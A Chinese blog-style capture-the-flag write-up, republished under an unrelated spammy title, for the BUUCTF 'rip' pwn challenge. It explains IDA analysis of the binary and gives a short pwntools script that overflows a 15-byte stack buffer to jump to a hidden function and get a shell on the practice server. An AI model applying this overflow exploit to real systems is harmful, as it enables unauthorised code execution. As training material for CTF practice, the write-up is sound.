当前位置：首页 > news >正文

休闲文化网站网站建设佰首选金手指二五

news 2025/11/1 15:10:47

休闲文化网站,网站建设佰首选金手指二五,seo自动优化软件下载,做网站系统学校网址 BUUCTF在线评测https://buuoj.cn/challenges#rip打开，如图所示提示：先别启动靶机，靶机可以最后在启动，先分析下载的附件pwn1。点击下载，下载完成之后，该文件后缀类型改为exe（就是将pwn…

网址

BUUCTF在线评测https://buuoj.cn/challenges#rip打开，如图所示

提示：先别启动靶机，靶机可以最后在启动，先分析下载的附件pwn1。

点击下载，下载完成之后，该文件后缀类型改为exe（就是将pwn1重命名为pwn1.exe）然后拖到IDA64.exe中。（我不知道后缀类型到底要不要改，网上很多教程都没讲清楚，然后我看了一下ida能打开的文件基本上都是exe的，我就自己改了）

注意：做pwn题目基本都要用到IDA跟虚拟机（Linux），所以要提前装好。

ida有很多版本，找一个能用的就行

ida及其相关资源网址（尽量找一些绿色网址下载）

IDA Pro入门指南：静态反编译神器的安装与使用详解-CSDN博客https://blog.csdn.net/qq_47403671/article/details/119939585逆向工具——IDA Pro的使用，从零基础到精通，收藏这篇就够了！_ida pro使用教程-CSDN博客https://blog.csdn.net/Python_0011/article/details/146866529IDA Pro 9.0 (macOS, Linux, Windows) - 强大的反汇编程序、反编译器和多功能调试器 - sysin - 博客园https://www.cnblogs.com/sysin/p/18639073我安装的是下面这个

[IDA] 加密与解密-ida的下载及详细安装过程（附有下载文件）_ida下载-CSDN博客https://blog.csdn.net/2301_77946674/article/details/141942756拖到ida64.exe中后有一些选项，默认就行了

打开后差不多是这样（我这里已经做完了，不知道怎么恢复原状）

如果不是这样的，双击左侧Functions window下的main,就变成这样了，再按F5（有些好像是F12）,总之一定要出现一下界面

再双击变量S，就是第六行的括号中的S，出现以下界面就可以了

注意到右边两个蓝色S，观察到S左边由0变到F，一共是十六位，不管有什么用，先记下来。

双击左侧fun，得到以下界面（注意看栏目）

如果是以下界面，请按F5（或其他）

拖动分界线，记录fun函数内存地址0x401186

最后编写exp（我不会，借鉴别人的）

# 导入 pwntools 模块
from pwn import *# 和靶机进行连接 
r = remote("node4.buuoj.cn",26817)#这里双引号里面的替换成自己所启动靶机的，端口26817一样替换为自己靶机的# 定义fun函数的内存地址
fun_addr = 0x401187# 定义payload,一共需要十六进制f(16)个字节数据a,需要8个十进制字节数据(b)，这些都是垃圾数据
# 最后加上p64函数转换的fun函数的地址
payload = (b"a" * 0xf) + (b"b" * 8) + p64(fun_addr)# 发送payload
r.sendline(payload)# 获取靶机交互式终端
r.interactive()

最后使用python运行，建议在虚拟机上操作。Windows上应该也可以

python 1.py #这里1.py替换成自己编写的python文件

我实在Ubuntu虚拟机上操作的，如图所示

输入ls（Linux ls（英文全拼： list directory contents）命令用于显示指定工作目录下之内容（列出目前工作目录所含的文件及子目录)。）

观察到特殊文件（或文件夹）flag，再次输入cat flag ，结果如图所示

得出flag

只不过我的虚拟机好像有点问题，在虚拟机中复制，却在主机上粘贴不了，害得我只能一个个敲出来。

注意

cat（英文全拼：concatenate）命令用于连接文件并打印到标准输出设备上，它的主要作用是用于查看和连接文件

其他，有需求请看以下网址内容

参考网址

BUUCTF-pwn-rip(第一个栈溢出) - Junglezt - 博客园https://www.cnblogs.com/Junglezt/p/17871927.htmlBUUCTF (PWN) RIP详细分析_buuctf rip pwn 解法-CSDN博客https://blog.csdn.net/qy201706/article/details/105397766buuctf rip 详细wp - refrain-again - 博客园https://www.cnblogs.com/refrain-again/p/15001283.htmlpwn学习（3）BUUCTF-rip - 技术栈https://jishuzhan.net/article/1704828218214715393

查看全文

http://www.dtcms.com/a/554812.html